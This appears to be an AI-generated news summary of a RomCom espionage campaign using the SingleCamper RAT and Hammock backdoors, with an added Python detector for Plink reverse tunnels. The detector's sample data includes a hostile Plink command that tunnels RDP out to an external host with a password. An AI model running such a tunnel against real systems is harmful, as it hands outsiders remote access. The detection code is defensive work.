Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

Russian RomCom Attacks: Unveiling the Dark Art of SingleCamper RAT Variant


Russian RomCom has been linked to a new wave of cyber attacks targeting Ukrainian government agencies and unknown Polish entities using a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0). The attack vector is characterized by spear-phishing messages that deliver a downloader containing the ShadyHammock or DustyHammock backdoor, which then execute post-compromise activities including network reconnaissance and data exfiltration.

  • The RomCom threat actor has launched a new wave of attacks using a variant of the Remote Access Trojan (RAT) called SingleCamper.
  • The attack vector involves spear-phishing messages with downloader payloads that deliver ShadyHammock and DustyHammock backdoors.
  • ShadyHammock acts as a launchpad for SingleCamper and listens for incoming commands, while DustyHammock contacts a command-and-control (C2) server and runs arbitrary commands.
  • The primary objective of SingleCamper is to execute post-compromise activities such as downloading PuTTY's Plink tool and exfiltrating data.
  • RomCom has been linked to attacks on Ukrainian government agencies and unknown Polish entities since late 2023, using the UAT-5647 moniker for SingleCamper.
  • The threat actor continues to evolve its tactics, techniques, and procedures (TTPs) with an aim to set up long-term persistence on compromised networks and exfiltrate data for espionage motives.



    The cybersecurity world has recently witnessed a new wave of attacks attributed to the notorious threat actor known as RomCom. According to Cisco Talos, this latest campaign involves a variant of the RomCom Remote Access Trojan (RAT) dubbed SingleCamper (aka SnipBot or RomCom 5.0). The attack vector is characterized by the use of spear-phishing messages, which deliver a downloader containing either the ShadyHammock or the DustyHammock backdoor.

    In this elaborate scheme, ShadyHammock acts as a launchpad for SingleCamper while also listening for incoming commands. On the other hand, DustyHammock is engineered to contact a command-and-control (C2) server, run arbitrary commands, and download files from the server. The researchers noted that despite its additional features, ShadyHammock appears to be a predecessor to DustyHammock.

    The primary objective of SingleCamper is to execute a wide range of post-compromise activities, including network reconnaissance and downloading PuTTY's Plink tool to establish remote tunnels to adversary-controlled infrastructure. This attack chain goes on to lateral movement, user and system discovery, and data exfiltration. The researchers surmised that the attacks are part of UAT-5647's dual-pronged strategy: establishing long-term access and exfiltrating data for espionage motives, followed by a potential pivot to ransomware deployment.
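    As an added illustration, not code from the article or from Cisco Talos, the following Python flags process-creation command lines in which Plink is used the way the article describes: a reverse tunnel out to adversary-controlled infrastructure. The sample command lines, the hostname tunnel.example.net and the alerting rule (reverse tunnel plus an external destination or an embedded password) are constructed assumptions for this example.

```python
# Added example, not from the article or Cisco Talos: flag process-creation
# command lines where PuTTY's Plink opens a reverse tunnel to an external host.
import ipaddress
import re

SAMPLE_CMDLINES = [  # constructed; real telemetry would be Sysmon Event ID 1 or EDR
    "plink.exe -batch -ssh -P 443 -l svc -pw hunter2 -R 3389:127.0.0.1:3389 tunnel.example.net",
    "plink.exe -batch -P 22 -l deploy -R 8080:localhost:80 10.0.5.20",
    "plink.exe -ssh -l admin 10.0.5.21 -batch uptime",
    "notepad.exe report.txt",
]
PLINK_RE = re.compile(r'(?:^|[\\/\s"])plink(?:\.exe)?\b', re.IGNORECASE)
VALUE_OPTS = {"-P", "-l", "-pw", "-R", "-L", "-D", "-i", "-m", "-hostkey", "-proxycmd"}  # take a value

def destination_host(argv):
    """Return the host part of Plink's [user@]host positional argument, or ''."""
    i = 1
    while i < len(argv):
        if argv[i].startswith("-"):
            i += 2 if argv[i] in VALUE_OPTS else 1
        else:
            return argv[i].rsplit("@", 1)[-1]
    return ""

def is_external(host):
    """True for non-private, non-loopback IPs; hostnames count as external."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # hostname; an allow-list of known jump hosts would refine this
    return not (addr.is_private or addr.is_loopback)

def analyse_plink(cmdline):
    """Alert dict for a Plink reverse tunnel that goes external or embeds a password; {} otherwise."""
    if not PLINK_RE.search(cmdline):
        return {}
    argv = cmdline.split()
    host = destination_host(argv)
    reasons = []
    if "-pw" in argv:
        reasons.append("password passed on the command line (-pw)")
    if host and is_external(host):
        reasons.append(f"destination {host} is outside private address space")
    # Internal reverse tunnels without a password are left to admin allow-listing.
    if "-R" in argv and reasons:
        reasons.insert(0, "reverse tunnel requested (-R)")
        return {"cmdline": cmdline, "host": host, "reasons": reasons}
    return {}
```

    Only the first sample trips the rule; the internal `-R 8080` tunnel to 10.0.5.20 is deliberately left unflagged so the rule can be tuned against legitimate administration.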

    The threat actor has been engaged in multi-motivational operations since its emergence in 2022, including ransomware, extortion, and targeted credential gathering. Notably, RomCom has expanded its tooling and infrastructure to support a wide variety of malware components authored in diverse languages and platforms such as C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).

    Furthermore, the attack chains begin with spear-phishing messages that deliver a downloader — either coded in C++ or Rust — which serves to deploy ShadyHammock and DustyHammock backdoors, respectively. In parallel, a decoy document is displayed to the recipient to maintain the ruse.

    The researchers believe that, despite its additional features, ShadyHammock is a predecessor to DustyHammock, given that the latter was observed in attacks as recently as September 2024.

    RomCom has been linked to this wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since late 2023. The intrusions are characterized by the use of SingleCamper, which is monitored under the moniker UAT-5647.

    In light of this latest attack vector, it's clear that RomCom continues to evolve its tactics, techniques, and procedures (TTPs) with an aim to set up long-term persistence on compromised networks and exfiltrate data for espionage motives. As such, cybersecurity professionals must remain vigilant in monitoring these attacks and developing strategies to counter the threat actor.



    Related Information:

  • https://thehackernews.com/2024/10/russian-romcom-attacks-target-ukrainian.html

  • https://www.linkedin.com/posts/dps-privacy-advisors_russian-romcom-attacks-target-ukrainian-government-activity-7252719546074075137-uV80


  • Published: Thu Oct 17 12:49:45 2024 by llama3.2 3B Q4_K_M
